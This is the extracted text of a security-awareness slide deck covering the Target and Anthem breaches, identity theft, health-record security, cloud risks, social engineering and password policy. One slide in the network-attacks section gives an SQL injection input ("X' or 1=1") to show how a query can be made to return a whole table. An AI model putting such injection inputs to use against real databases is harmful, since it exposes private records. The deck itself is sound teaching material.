What is all the Buzz about Computer Security?
advertisement
COMPUTER SECURITY: WHAT’S ALL THE FUSS ABOUT? BARBARA HEWITT, PHD AGENDA • • • • • • The Goal The Issues Computer security Identify theft Healthcare identify theft Electronic health records (the first topics will lead into why EHR is such a concern…) THE GOAL: CIA OF SECURITY THE PROBLEM IS EVOLVING • Dumb terminals • CRTS and 10 MB hard disks • P2, P3, • Core 5, Core 7, 500 Gigs, 8 G Ram • Now its on the cloud… who has it???? EVOLUTION OF HACKERS • White hat hackers • Black hat hackers • Script kiddies • Organized crime and other crime • State sponsored hackers • Spy hackers • Cyber terrorists • Hacktivist RECAP 2012 • 27,485,000 lost/stolen/missing records • 680 breaches reported (who knows how many are not reported) • South Carolina 6.4M identities stolen • Germany – 3 month hack 8.4 M identities posted online • California 1M UDID removed 7 months to discover • California tech X2 – 800K IDs stolen 6-12 months -• Florida College 300K identities – 5 months • Arizona – 42K PHI – 6 months • Ohio – 15K -- 18+ months ADVERTISEMENT FOR TARGET STOLEN TARGET CARDS A TIMELINE OF THE TARGET DATA BREACH TARGET’S POSSIBLE MISSED OPPORTUNITIES TARGET CORPORATE RESPONSE Access Point closed when it was discovered on December 15, 2013. No indication that social security numbers were taken. We are committed to making this right and are investing in the internal processes and systems needed to reduce the likelihood that this ever happens again. For example, we are accelerating our plans to put chip-enabled technology in our stores and on our Target REDcards by early 2015, six months ahead of our previous plan. TARGET’S RESPONSE Federal Testimony - Not aware of the breach until December 12th - Incident happened from November 27th through December 15th - “Target had in place multiple layers of protection, including firewalls, malware detection software, intrusion detection and prevention capabilities and data loss prevention tools.” V.P & CFO testimony Certified compliant with Payment Card Industry Data Security Standards (PCI-DSS) in 2013 TARGET’S RESPONSE Media and Customer Backlash - News of the breach broke from sources other than Target. - “5 Lessons For Every Business from Target’s Data Breach” Forbes Online - “the company moved quite slowly on the breach” Tech Crunch - “Communication with customers from Target was inadequate and unclear” WSJ Lack of communication and ability to respond in a timely manner allowed for further scamming incidents claiming to ‘assist’ customers that had been affected by acting as a spokesperson from the retailer. FINANCIAL IMPACT • 40 million - Card information stolen over 19 days. (Nov. 27 – Dec. 15) • 70 million - Customer records stolen. • 46 percent - Drop in profit during the 4th quarter of 2013, when compared to 2012. • $148 million – Estimated cost of the breach (through the end of Summer 2014) for Target (offset by $38 million insurance policy) • $53.7 million – Estimated value hacker’s earned based on the sale of 2 million cards on the black market. • $55 million - Estimated executive compensation the CEO will earn on his departure from Target • $200 million - Estimated dollar cost to banks and credit unions for reissuing cards and handling issues related to FINANCIAL IMPACT THE IT IMPACT • Hire • Chief risk and compliance officer – Jacqueline Hourigan Rice – Reports directly to CEO • CISO – Brad Maiorino • Updates on security and technology enhancements – Enhance monitoring and logging – Installation of application whitelisting POS systems – Implementation of enhanced segmentation IT IMPACT: BIGGEST INVESTMENT • Investment into chip-enabled card technology – MasterCard chip-and-PIN • $100 million • Implemented in 2015 – 1,797 stores HOW TARGET COULD HAVE REACTED DIFFERENTLY • • • • Not ignoring warnings of system temperament Segregating the POS systems End to end encryption Inventory of systems – Whitelisting • Detailed logging Duration People Affected Info. Stolen 2007 187 Month Period 4.5 -8.6 Billion Estimated 45 Million Debit/Card numbers April 2014 – Sept. 2014 56 Million Credit card Number 25,000 Names, card numbers, and CVV codes 1.2 Million Card numbers 3 Million Card numbers Dairy Queen Aug. 2014 – Sept. 2014 TBD Card numbers, names and expiration dates Kmart Sept. 2014 – Oct. 2014 TBD Card numbers Company T.J. Maxx Home Depot Sally Beauty Supply Neiman Marcus Michaels Stores Feb. – March 2014 July 2013 – Jan. 2014 May 2013 – Jan. 2014 SECURITY BREACHES SECURITY BREACH INFORMATION Identity Theft Resource Center http://www.idtheftcenter.org/images/breach/DataBreachReports_2014.pdf Identity Theft Resource Center Report Date: 11/25/2014 2014 Data Breach Stats/Total Breaches: 696 Records Exposed: 81,443,910 https://www.privacyrights.org/ 931,357,921 RECORDS BREACHED from 4,449 DATA BREACHES made public since 2005 COST OF SECURITY DATA BREACH How do you calculate the cost of data breach? • Direct expenses • Forensic experts • outsourcing hotline support • providing free credit monitoring subscriptions and discounts for future products and services • Indirect costs • In-house investigations and communication • extrapolated value of customer loss resulting from turnover or diminished customer acquisition rates. According to the research, the average total cost of a data breach for the companies participating in this research increased 15 percent to $3.5 million The average cost paid for each lost or stolen record containing sensitive and confidential information increased more than 9 percent from $136 in 2013 to $145 in 2014 study. (IBM and Ponemon) LESSONS LEARNED http://www.businessweek.com/videos/2014-03-13/hacking-timeline-what-didtarget-know-and-when • States enacting laws • Kentucky, Iowa, Florida, Minnesota, California and New Jersey • What businesses must do if they discover a breach that has compromised customers' personal data. As of January of this year: The Senate has four data security proposals that many in the chamber believe could be combined into a single bill that would win approval and go to the House. The House has several cyber security bills and one breach notification bill. EVOLUTION • Same list for last 3 years COMPUTER EVOLUTION EVOLUTION THE SECURITY PROBLEM • Security was physical • From mainframes to PCs, smart phones, iPads, tablets, and other personal devices • Ubiquitous everywhere internet • Today, data is more expensive than computers GEEK EVOLUTION SECURITY TRENDS Knowledge necessary to exploit vulnerabilities sophistication of attack SECURITY TRENDS • Organizations experiencing security incidents declined from 46 percent in 2007 to 43 percent in 2008 • Four types of attacks are on the rise • Unauthorized access • Theft/loss of proprietary information • Misuse of web applications • DNS attacks • The average loss due to theft of proprietary information was $5.69 million in 2007. • The average loss due to financial fraud was $21.12 million in 2007. TRAFFIC ORIGINATION ATTACKS Q4 2012 Russia disappeared off list of top breaches in mid 2014 – don’t think this means they are not out there… THE SECURITY PROBLEM CYBER CRIMES Computer was the target Malware Denial of services Computer was used to perpetrate the act Identify theft Medical identify theft Cyberstalking Information warfare Phishing scams SKIMMING • Practice of scanning credit card into a device • Key pad to enter pin and/or CVM code • Difficult to detect individually • compare a large trends • Use data mining to discover relationships among transactions and commonality – merchant/location COUNTERMEASURES: CARD ISSUERS • Fraud detection and prevention software • Profiles -- ip addresses • Detection • Contact card holder • Place account on hold • Block card • Investigate activity • Strong authentication • Multifactor: pin zip, challenge questions, CMV • Out of band authentication text message, phone call or security token device • Collaboration via industry COUNTERMEASURES • Merchants • Pan truncation (display last 4 digits of #) • Tokenization (data security) not store full # in DB • Additional information pin, zip code, or CMV CHIP AND PIN EMW TECHNOLOGY • EMV – Europay Mastercard and VISA • Widely used in Europe, Mexico, Brazil and Japan • Embedded security chip and Pin • VISA adoption in 4/13 but will move to mobile device near-field technology in the future • MC will follow CHIP AND PIN EMW TECHNOLOGY • Cost to switch in US $3B or R$6Billion • 2 researchers have figured out how to skim the #s • Next move toward dynamic authentication with a unique card or data that cannot be duplicated BANK CHIP AND PIN • FICO Falcon Fraud Manager Consortium reports a 60% drop in counterfeit fraud between 3/09 and 3/11 • US accounts for • 27% of credit card volume of purchases • 47% of global credit card fraud occurs in the US COST FOR STOLEN DATA • Sony hack netted 2.2M credit card # per hackers and 12.7K per Sony • Seen data that show that prices dropped per stolen credit card # from $5-10 each to $1-2 • Target Credit Cards sold for $20-40 each in late 2013 with refund if card had been stopped OTHER BREACHES • Simply take pictures of front and back of card WAYS TO FIND INFORMATION • Linked In IDENTITY THEFT HTTP://WWW.CONSUMER.FTC.GOV/FEATURES/FEATURE-0014-IDENTITY-THEFT http://www.consumer.ftc.gov/features/feature-0014-identity-theft • Data breaches cost $194/record breached REPAIR ID THEFT • Immediately • Place initial fraud alert • Order your credit reports • Create an identity theft report • Monitor progress • Log all phone calls • Send all correspondence by certified mail with return receipt • Keep all original documents • List all important dates/send follow-ups when companies are delinquent LONG-TERM • Extend fraud alerts and credit freezes – most attacks come 6 months after cc is stolen • Repair your credit • Sample letters at www.consumer.ftc.gov • Your rights under federal law • Identity theft report • 90-day initial fraud alert – extend to 7 years • Free copies of credit report • Fraudulent information blocked • Dispute inaccurate and fraudulent information • Get copies of documents related to your case • Stop debt collectors from harassing you COMMON CAUSES SECURING ELECTRONIC HEALTH RECORDS CLINTON (1999) “As more of our medical records are stored electronically, the threat to all of our privacy increases.” HEALTHCARE • 230,000 physicians • 8700 hospitals • 35M Americans HIPAA, HITECH, AMERICAN RECOVERY • Mandate protection • Safeguard information HEALTHCARE MEDICAL IDENTITY THEFT • 1.5M people in US in 2011 • $41.3B in 2012 • 1.85 M people in 2012 • $12B in 2012 • $233 per lost healthcare record • 94% hospitals data breaches • 52% of orgs experienced medical identity theft COST OF MEDICAL DATA BREACHES MEDICAL IDENTITY THEFT • Detection • Check medical and insurance statements regularly • Bill for medical services you didn’t receive • Call from a debt collector about a medical debt you don’t owe • Medical collection notices on your credit report that you don’t recognize • Notice from your health plan saying you reached your benefit limit • Denial of insurance because your medical records show a condition you don’t have. SOME EXAMPLES • Anthem • Sutter Home ANTHEM • Second or third largest health insurer • Network partner of BCBS • 78.8 total – customers & others • 8.8 to 18.8 were not direct customers • Used services over past 10 years ANTHEM – WHAT WAS TAKEN • Names • Dates of birth • Member ID/Social Security numbers • Addresses, phone numbers, email addresses • Employment information such as income data ANTHEM – WHO DID IT? • Chinese government? • Very sophisticated external cyber attack • Too early to really tell ANTHEM – WHAT ARE RESULTS? • Children’s records are affected • SSN stolen • No prior credit history • Might not know for years ANTHEM – WHAT ARE RESULTS? • Insurance numbers used for treatment • Victim saddled with bills and inaccurate health care records • Contacted to pay for services not received • Reduction in allowable benefits for services used • Incorrect medical diagnosis WHAT CAN I DO? • Choose strong passwords • Change passwords often • Be aware of what you store and share electronically • Never email confidential information • Delete old bank account information and credit card numbers • Never store a master list of password WHAT CAN I DO? • Consider using protection • Software updates • Two-factor authentication • Use secured encrypted connections (HTTPS) • Throw away email address • Don’t download files from unknown sources WHAT CAN I DO? THE PROPOSED MODEL Virus Awareness Malware awareness Security Knowledge Number of employees Size of practice Firewall awareness Security of cloud Adoption of security when implementing EHR systems Environment Costs Encryption awareness Secure EHR Adoption Secure EHR in Cloud Adoption Compliance issues ALTERNATIVE MODEL Authentication Ease of use EHR Features Encryption Security of cloud Security Knowledge EHR system Adoption considerations Secure EHR considerations Firewall Malware/ virus Authentication Environment Costs Compliance issues CLOUD • Type of cloud • Public – IT services including software, development, and infrastructure delivered via the internet • Private –virtualized data center that sits behind the organization’s firewall delivers IT as a service to internal users • hybrid TYPES OF CLOUDS CLOUD INFRASTRUCTURES • Servers virtualized • Shared across multiple lines of business • Among multiple businesses • Link multiple cloud centers together • Public cloud in Singapore • Private cloud in UK CLOUD INFRASTRUCTURES • Security tools are far flung • IT loses • degree of control • Visibility into workloads and data • Not sure about compliance BENEFITS OF THE CLOUD • Reduced costs • Pay incrementally • Save money • Make budgeting easier and more predictable • Safer data • Physical protection against fire, flood, data theft, and other concerns Benefits of the Cloud • Anywhere/anytime • 24/7 data access • Choose what level of access to give employees, customers, etc. • Increased storage capacity • Grows and shrinks with business • Easily upgradable Benefits of the Cloud • Worry-free maintenance • Upgrades are handled automatically by professional data center staff • Hardware • Software • Security CLOUD SECURITY • Physical security • Redundant power supplies • Redundant internet connections • Redundant hardware • Fire and flood protection • theft CLOUD SECURITY • Application security • Firewalls • Antivirus • Data encryption software • • Between firm and data center Administrative controls • Govern access with data • Limit access to certain functions • Protect client files MANAGING RELATIONSHIP • Cloud provider may need to access to your data • Policies in place about data access • Data access • Right to refuse access • Data logs record who has accessed your data and when • Read privacy statement in agreement and contract MANAGING RELATIONSHIP • Ensure that your provider will not use your data for marketing or promotional activities • Opt in or out option • Your data – you are responsible for the data and your client’s privacy WHAT IT PROFESSIONALS MOST WORRIED ABOUT Private cloud • Lack of control • Lack of visibility into abstracted resources Public cloud – No way to measure security – Lack of control (general) Compliance Hypervision vulnerabilities – shared space on a single hardware device Hackers access to the data CLOUD • Reasons to use • Decrease capital investment • Decrease operating costs • Increase flexibility • Scalable ABUSE AND NEFARIOUS USE OF CLOUD COMPUTING • Examples: • • things hosted on IaaS sites: • Zeus botnet • Infostealer Trojan horses • Download for Microsoft office and Adobe PDF exploits Ran from sites: • Bots TOOLS ARE EASY TO USE BYOD • Create policy first • Ensure all devices follow policy before procuring technology • KISS • Make enrollment simple • Ensure end-user can configure device • Self service portals – user’s responsible • • • • • Personally identifiable data on personal devices must be respected Keep corporate and personal data separate Monitor and manage system Manage data usage ROI WIRELESS • Don’t use it except to pick a restaurant • Without releasing your other data • Starbucks FREE WIFI is not FREE • Jeremy – cto white hack security • BBQ Lockhart • Snows • Krites CLOUD • Infrastructure as a service (IaaS) • Operating systems images and all application sotware • Platform as a service (PaaS) • OS, programming language executing environment, database and web server • Software as a service (SaaS) • Install and operate application software CLOUD • Storage as a service (STaaS) • Scalable • Economical • Security as a service (SECaaS) • Provider integrates security services with client to on a subscription basis • virus/malware/spyware support • Intrusion detection • Security event management • Etc. CLOUD • Data as a service (DaaS) • Data provided on demand regardless of • Geographic • organizational • Separation between provider and consumer • Emergence f service-oriented architecture CLOUD • Database as a service (DBaaS) • Provides database server • Test environment as a service (TEaaS) • On-demand test environment • All in one • Often uses thin clients CLOUD • Desktop virtualization • Separates the desktop environment from the hardware • Can store virtualization on a centralized server • Allows for use of thin client, smart device usage • API as a service (APIaaS) • Create and host aplication programming interfaces • Backend as a service (BaaS) • Mechanism to link web and mobile app developers mobile devices with back-end cloud storage CLOUD TIERS Tier Level 1 2 Requirements •Single non-redundant distribution path serving the IT equipment •Non-redundant capacity components •Expected availability of 99.671% •Meets or exceeds all Tier 1 requirements •Redundant site infrastructure capacity components •Expected availability of 99.741% CLOUD TIERS Tier Level Requirements 3 •Meets or exceeds all Tier 1 and Tier 2 requirements •Multiple independent distribution paths serving the IT equipment •All IT equipment must be dual-powered and fully compatible with the topology of a site's architecture •Concurrently maintainable site infrastructure with expected availability of 99.982% CLOUD TIERS Tier Level Requirements 4 •Meets or exceeds all Tier 1, Tier 2 and Tier 3 requirements •All cooling equipment is independently dualpowered, including chillers and heating, ventilating and air-conditioning (HVAC) systems •Fault-tolerant site infrastructure with electrical power storage and distribution facilities with expected availability of 99.995% CLOUD • Database as a service (DBaaS) • Test environment as a service (TEaaS) • Desktop virtualization • API as a service (APIaaS) • Backend as a service (BaaS) CLOUD ARCHITECTURE CLIENT’S ROLE • Biggest risk to data is within the firm • Mis-routed data • Other simple mistakes • Outright theft by employees • Centralized control offers better protection CLIENT’S ROLE • Easier to establish and enforce policies • Remove issues related to onsite storage • Patchwork in email accounts • Physical media • Thumb drives • Must still establish and implement policies ACCESS MANAGEMENT • Administrative modules • Allows system administrator in firm to grant user access • Place restrictions on who can access what data nd functions ACCESS MANAGEMENT • Usage policies • Where can employees access data from • Public locations where others might be able to view • Can data be exported to insecure media or be distributed • Can client data be emailed or transferred via insecure methods • While the cloud provider can help with good policies, the organization must communicate these policies and enforce them STUDY • IT professionals from Germany, UK, United States and China • 100-499, 500-999, to 1000+ Employees UR KEY CONFIDENCE BOOSTERS PUBLIC CLOUD USE • Set and enforce security policies across cloud – common way to manage and ensure consistency of security across both private and public platforms • Create data boundaries – give IT more control over where certain workloads can run • http://www.intel.com/content/www/us/en/cloud-computing/whatsholding-back-the-cloud-peer-research-report.html OPEN TO NETWORK TYPE ATTACKS • Distributed denial of service attacks • user hijacks a server then the hacker & stops web services from functioning • To stop • • the use of syn cookies and limiting users connected to a server all help stop a DDOS attack man in the middle attack • the secure sockets layer (SSL) is incorrectly configured • client and server authentication may not behave as expected therefore leading to man in the middle attacks. [3] EN TO NETWORK TYPE ATTACKS • Network sniffing using a packet sniffer • capture sensitive data • unencrypted such as passwords and other web service related security configuration such as the UDDI (Universal Description Discovery and Integrity), SOAP (Simple Object Access Protocol) and WSDL (Web Service Description Language) files. • Port scanning – Port 80 is always open due to it being the port that the web server sits on. • encrypted and as long as the server software is configured correctly then there should be no intrusion PEN TO NETWORK TYPE ATTACKS • SQL injection • use special characters or terms to return unintended data • strings that may end up in a WHERE clause of an SQL statement may be tricked into including more information. • value of X’ or 1=1 may cause a whole table to be returned as 1=1 is always seen as true PEN TO NETWORK TYPE ATTACKS • Cross site scripting • inserting code into a field or URL that gets executed hands over control or sensitive data to the attacker. • lead to buffer overflows, DOS attacks, inserting spyware and malicious code into visiting browsers and violation of user privacy EN TO NETWORK TYPE ATTACKS • LOSS OF GOVERNANCE: • cede control to the Cloud Provider (CP) on a number of issues which may affect security. • SLAs may not offer a commitment to provide such services on the part of the cloud provider, thus leaving a gap in security defenses PEN TO NETWORK TYPE ATTACKS • LOCK-IN • currently little on offer in the way of tools, procedures or standard data formats or services interfaces that could guarantee data, application and service portability • Hard for customer to migrate from one provider to another or migrate data and services back to an in-house IT environment • dependency on a particular CP for service provision, especially if data portability, as the most fundamental aspect, is not enabled EN TO NETWORK TYPE ATTACKS • DATA PROTECTION • cloud computing poses several data protection risks for cloud customers and providers • difficult for the cloud customer (in its role as data controller) to effectively check the data handling practices of the cloud provider • Can’t ensure that the data is handled in a lawful way • exacerbated in cases of multiple transfers of data, e.g., between federated clouds • Cloud providers should provide information on their data handling practices. Some also offer certification summaries on their data processing and data security activities and the data controls they have in place, e.g., SAS70 certification EN TO NETWORK TYPE ATTACKS • DATA PROTECTION • Cloud providers should • Provide information on their data handling practices • offer certification summaries on their data processing and data security activities and the data controls they have in place, e.g., SAS70 certification N TO NETWORK TYPE ATTACKS • INSECURE OR INCOMPLETE DATA DELETION • Is data truly wiped when a request to delete a cloud resource is made • as with most operating systems, this may not result in true wiping of the data N TO NETWORK TYPE ATTACKS • INSECURE OR INCOMPLETE DATA DELETION • Adequate or timely data deletion impossible (or not wanted by customer) because extra copies of data are stored but are not available, or because the disk to be destroyed also stores data from other clients • Multiple tenancies and the reuse of hardware resources, this represents a higher risk to the customer than with dedicated hardware N TO NETWORK TYPE ATTACKS • Lack of physical authentication such as biometrics and swipe cards • Mis-configuration may also contribute to the loss of data or allow a hacker to gain entry • un- patched operating system software • use of un-trusted software and tools within the cloud TOP 5 CLOUD SECURITY ISSUES • Every breached security system was once thought infallible • Understand the risks of cloud computing • How cloud hosting companies have approached security • Local law and jurisdiction where data is held • Best practice for companies in the cloud THE SECURITY PROBLEM CYBER CRIMES Fraud Alter computer input (integrity) Alter destroy, suppress, or steal output Alter or delete stored files/data Alter or misuse system tools or software packages Bank fraud Identify theft Extortion Theft of classified information THE SECURITY PROBLEM CYBER CRIMES Cracking Copyright infringement Child pornography Child grooming Espionage THE SECURITY PROBLEM CYBER CRIMES Spam – crime in some jurisdictions Obscene or offensive content Harassment – cyber bullying, stalking, hate crime, online predator Threats Drug trafficking Cyber terrorism Cyber warfare Electronic health records MALWARE • Malware – malicious software • Viruses - no useful purpose. • Worms - reproduce • Trojan horses – hidden in software • Remedies • Antivirus software and system patching • Seldom used in highly structured attacks. SAMPLE OF SECURITY INCIDENTS • The Morris Worm (November 1988) • Citibank and Vladimir Levin (June–October 1994) • Kevin Mitnick (February 1995) • I Love You Virus (May 2000) • The Code Red Worm (2001) • Adil Yahya Zakaria Shakour (August 2001–May 2002) • Omega Engineering and Timothy Lloyd (July 1996) • The Slammer Worm (2003) • Worcester Airport and “Jester” (March 1997) • U.S. Electric Power Grid (1997–2009) • Solar Sunrise (February 1998) • Conficker (2008–2009) • The Melissa Virus (March 1999) • TJMaxx (2004-2006) • Fiber Cable Cut (2009) • Stuxnet (2011-12) THREATS TO SECURITY • Unstructured threats to highly structured threats • Internal vs. external • Elite hackers vs. script kiddies STRUCTURED VS NONSTRUCTURED • Structured • Long period of time • Large number of individuals • Financial backing • Seek help of insiders • Unstructured threats • Short periods of time (lasting at most a few months), • Small number of individuals • Little to no financial backing • Insiders or outsiders who do not seek collusion with other insiders INSIDER VS EXTERNAL ATTACKS • Insiders • Disgruntled employees • Accident/not an attack at all • External • Organized crime • Terrorists and information warfare • Hacktivist INSIDERS • Malicious • Logic bombs • Embezzlement • Data theft • Innocently • Data leakage • Social engineering • Weak passwords HACKERS • Person who had a deep understanding of computers and networks • Explore how things worked in their separate parts (or hack them). • Media redefined the term as a person who attempts to gain unauthorized access to computer systems or networks • Deliberately access computer systems and networks without authorization ORGANIZED CRIME • Financial transactions over the Internet increased • Fraud, extortion, theft, embezzlement, and forgery • Structured threat ERRORISTS AND INFORMATION WARFARE • Nations depend upon computers • Targets of unfriendly foreign powers • Information warfare is the warfare conducted against the information and information processing equipment used by an adversary. • Highly structured threat • Can be against national infrastructure CRITICAL INFRASTRUCTURES • During warfare, may choose targets other than the opposing army. • Critical infrastructures are those whose loss or impairment would have severe repercussions on society. • Water, electricity, oil and gas refineries, banking, and telecommunications. HACKTIVIST • Attack to make a statement or prove a point • Targets organization that hacktivist (group) disagrees with • Political reasons AVENUES OF ATTACK • Specifically targeted • Organization or nation • Do not know equipment or software • Time consuming • Target of opportunity • Identify vulnerability • Software exploitable • Locate system with vulnerability SECURITY PRINCIPLES • Security approaches • Least privilege • Separation of duties • Implicit deny • Job rotation • Layered security • Defense in depth • Security through obscurity • Keep it simple SECURITY APPROACHES • Ignore Security Issues • “Out of the box” • Host Security • Each computer is “locked down” individually. • Maintaining an equal and high level of security amongst all computers is difficult and usually ends in failure. • Network Security • Controlling access to internal computers from external entities LEAST PRIVILEGE • Least privilege means a subject (user, application, or process) should have only the necessary rights and privileges to perform its task with no additional permissions. • By limiting an object's privilege, we limit the amount of harm that can be caused. • For example, a person should not be logged in as an administrator—they should be logged in with a regular user account, and change their context to do administrative duties. SEPARATION OF DUTIES • More than one individual • Applicable to physical environments as well as network and host security. • No single individual can abuse the system. • Potential drawback is the cost. • Time – Tasks take longer • Money – Must pay two people instead of one IMPLICIT DENY • If a particular situation is not covered by any of the rules, then access can not be granted. • Any individual without proper authorization cannot be granted access. • The alternative to implicit deny is to allow access unless a specific rule forbids it. JOB ROTATION • The rotation of individuals through different tasks and duties in the organization's IT department. • The individuals gain a better perspective of all the elements of how the various parts of the IT department can help or hinder the organization. • Prevents a single point of failure, where only one employee knows mission critical job tasks. LAYERED SECURITY • Secure a system with multiple levels • Different access controls • Various tools and devices • Challenge to compromise system • take longer • cost more than its worth • Potential downside • Time and money to implement DIVERSITY OF DEFENSE • Complements the layered security approach. • Dissimilar/different layers of security • Benefits • Compromise one layer • Still must get through the next layer with a different system of security. SECURITY THROUGH OBSCURITY • Effective environment and protection mechanisms are confusing or supposedly not generally known. • Hide an object • It’s not effective. USERS == PEOPLE A SECURITY PROBLEM USERS • User • Groups • Authentication • Access control SOCIAL ENGINEERING • Process of convincing an individual to provide confidential information or access to an unauthorized individual. • One of the most successful methods that attackers have used to gain access to computer systems and networks. • The technique relies on an aspect to security that can be easily overlooked: people. • Most people have an inherent desire to be helpful or avoid confrontation. Social engineers exploit this fact. • Social engineers will gather seemingly useless bits of information, that when put together, divulge other sensitive information. This is “data aggregation.” SOCIAL ENGINEERING • Technique in which the attacker uses deceptive practices to • Convince someone to divulge information they normally would not divulge. • Convince someone to do something they normally wouldn’t do. • Why social engineering is successful • People desire to be helpful. • People desire to avoid confrontation. SOCIAL ENGINEERING • Seemingly innocuous information can be used • Directly, in an attack • Indirectly, to build a bigger picture to create an aura of authenticity during an attack • Indirect methods • Phishing • Vishing SECURITY HOAXES • Hoaxes designed to elicit user reaction • Delete a file • Change a setting • Spread the word • Defense • Training and awareness POOR SECURITY PRACTICES • Users create security problems via poor practices • Writing secrets down • Password selections • Piggybacking • Dumpster diving • Installing unauthorized hardware/software PIGGYBACKING • Following closely behind a person who has just used their own access card to gain physical access to a room or building. • Relies on the attacker taking advantage of an authorized user not following security procedures. • i.e. returning from a smoking area • Countered by • Training and awareness • Guards • Man trap or turnstile DUMPSTER DIVING • Process of going through a target’s trash • Not unique to the computer community • Identity thieves, private investigators, and law enforcement personnel • Corrections • Shred sensitive information • Secure the trash receptacle. • Shredding personal or sensitive information you discard LLING UNAUTHORIZED WARE AND SOFTWARE • Policy that restricts users installing software and new hardware on their systems. • Common examples: • Unauthorized communication software to connect from home. • Installing a wireless access point • Installing games • Creates a backdoor that circumvents all the other security mechanisms in place. INSTALLING UNAUTHORIZED HARDWARE AND SOFTWARE • Many organizations • • do not allow their users to load software or install new hardware without authorization. screen, and occasionally intercept, e-mail messages with links or attachments that are sent to users. • This helps prevent users from unwittingly executing malware. • have their mail servers strip off executable attachments to e-mail so that users can’t accidentally cause a security problem. PHYSICAL ACCESS BY NON-EMPLOYEES • Can access the computer systems and networks • Complacent with a legitimate reason to access the facility • Consider personnel who have legitimate access, but could have intent to steal intellectual property • Provides opportunity for individuals to look for critical information carelessly left out. • With the proliferation of devices such as cell phones with built-in cameras, photographs. PEOPLE AS A SECURITY TOOL • People can be an effective security mechanism. • Policies and procedures • Training and awareness • Many eyes • Challenge visitors • Report abnormal conditions • Make everyone responsible and involved. SECURITY AWARENESS • An active security awareness program will vary depending on • The organization’s environment • The level of threat • Initial employee training on social engineering • As well as periodic refresher training • Clean Desk Policy • Screen savers INDIVIDUAL USER RESPONSIBILITIES 1. Lock doors 2. No sensitive information in your car 3. Secure storage media containing sensitive information. 4. Shred sensitive documents before discarding. 5. Do not divulge sensitive information to individuals not authorized to know it. 6. Do not discuss sensitive information with family members. AUTHENTICATION VS ACCESS CONTROL • Authentication • verifies the identity of a subject • Process by which a user proves that she is who she says she is. • Access control • ability of a subject (individual or process running on a computer system) to interact with an object (file or hardware device). • Goal is to allow access to authorized users and to make sure access is denied to unauthorized people. AUTHENTICATION • Three types of authentication • Something you know (password) • Still most used method • Something you have (token or card) • Something you are ( biometric) + Behavior /pattern/how you do it • Type • Talk • Walk PASSWORD SELECTION • Users tend to pick passwords that are easy for them to remember • Dates • Names • +1,2,3 on changes Mary1, Mary2, Mary3 • If it’s easy for user to remember, • more you know about the user, the better your chance of discovering their password PASSWORD SELECTION • The rules for good password selection in general: • • • • • • 16+ characters Combination of upper- and lowercase letters At least one number At least one special character Do not use a common word, phrase, or name Choose a password that you can remember so that you do not need to write it down. • Don’t use common phrases, song, poem or speech that you know by heart or even the first letters of those • Don’t write it down PASSWORD SELECTION • Phrase • Use the first letter of each word in the phrase. • Jack be nimble, jack be quick, jack jumped over the candlestick • Becomes Jbnjbqjj0tcs! • But that one is known – a private phrase • This is the first day I teach in Brazil - hope it goes well • Ex: tIt1dit1Bzhigzw3L • Too complex – write it down PASSWORD POLICY COMPONENTS • Password construction • Reuse restrictions • Password history • Minimum expiration • Maximum expiration • Duration • Protection of passwords • Consequences PASSWORD POLICY OPTIONS DOMAIN PASSWORD POLICY ELEMENTS • Enforce password history • Maximum password age • Minimum password age • Minimum password length • Password must meet complexity requirements • Do not Store passwords using reversible encryption TOKENS • “something you have” • Physical object that identifies specific access rights • Smart card • USB key • RFID • Drawback • token is being authenticated • theft of the token could grant anyone who possessed the token access to what the system protects • Forget or lose it BIOMETRICS • Biometrics use the measurements of certain biological factors to distinguish one specific person from others. These factors are based on parts of the human body that are unique. The most well known of these unique biological factors is the fingerprint. • False positives and false negatives are two issues with biometric scanners. FALSE POSITIVES A false positive occurs when a biometric is scanned and allows access to someone who is not authorized—for example, two people who have very similar fingerprints might be recognized as the same person by the computer, which grants access to the wrong person. FALSE NEGATIVES A false negative occurs when the system denies access to someone who is actually authorized—for example, a user at the hand geometry scanner forgot to wear a ring he usually wears and the computer doesn’t recognize his hand and denies him access. MULTIPLE-FACTOR AUTHENTICATION • Combination of two or more types of authentication. • what you are (for example, biometrics) • what you have (for instance, tokens) • what you know (passwords and other information). + how you do it SECURITY POLICIES & PROCEDURES • Policy – High-level statements created by management that lay out the organization's positions on particular issues • Security policy – High-level statement that outlines both what security means to the organization and the organization's goals for security • Procedure – General step-by-step instructions that dictate exactly how employees are expected to act in a given situation or to accomplish a specific task ACCEPTABLE USE POLICY • Outlines the behaviors that are considered appropriate when using a company’s resources. • Internet use policy • Where can employees browse • E-mail usage policy • Non-work e-mail traffic is allowed at all or severely restricted. SINGLE SIGN-ON Single sign-on (SSO) is an authentication process in which the user can enter a single username and password and then be able to move from application to application or resource to resource without having to supply further authentication information SINGLE SIGN-ON • Reduces login hassles: • Fewer usernames and passwords to remember • Quick access for emergencies such as in healthcare • Inherently less secure: • If a login is compromised for one system, all systems the user can access are also compromised POLICIES AND PROCEDURES • Physical security policies and procedures relate to two distinct areas: • Those that affect the computers themselves • Those that affect users COMPUTER POLICIES • Remove/disable the floppy disk system. • Remove/disable the optical drive system. • If that is not possible, remove the device from the boot menu and set a BIOS password. • Disallow USB drive keys, either with active directory or registry settings. • If that is not possible, implement aggressive anti-malware scanning. COMPUTER POLICIES • Lock up or encrypt equipment that contains sensitive data. • Train all employees: • To challenge strangers • To follow procedures • To lock workstations before leaving them PHYSICAL BARRIERS • Principle of layered security • Fences • Guard at the gate • Open space • Walls • Signs denoting public and private areas • Man trap BEING PREPARED • Disaster Recovery • Business Continuity • Backups • Alternate sites • Power sources • Spare parts • Plans • Policies PRIVACY • Privacy policy should be completed detailing how information is safeguarded. • Privacy is enforced by law for some organizations. • Personally Identifiable Information (PII) is becoming increasingly important to safeguard. HUMAN RESOURCES POLICIES • People are the weakest link in security. • Specific policies should be developed regarding: • New hire screening processes • Periodic review process for current employees • Employee termination process • Mandatory vacation to uncover wrongdoing CODE OF ETHICS • Describes expected behavior from a highlevel standpoint • Sets tone for employee conduct • Encourages integrity and high ethical standards SECURE DEVELOPMENT LIFECYCLE • Firms have recognized the need for secure code. • Security should be an issue that is addressed throughout the development process. • The SDL accounts for security in each of its four major phases: • Requirements phase • Design phase • Coding phase • Testing phase
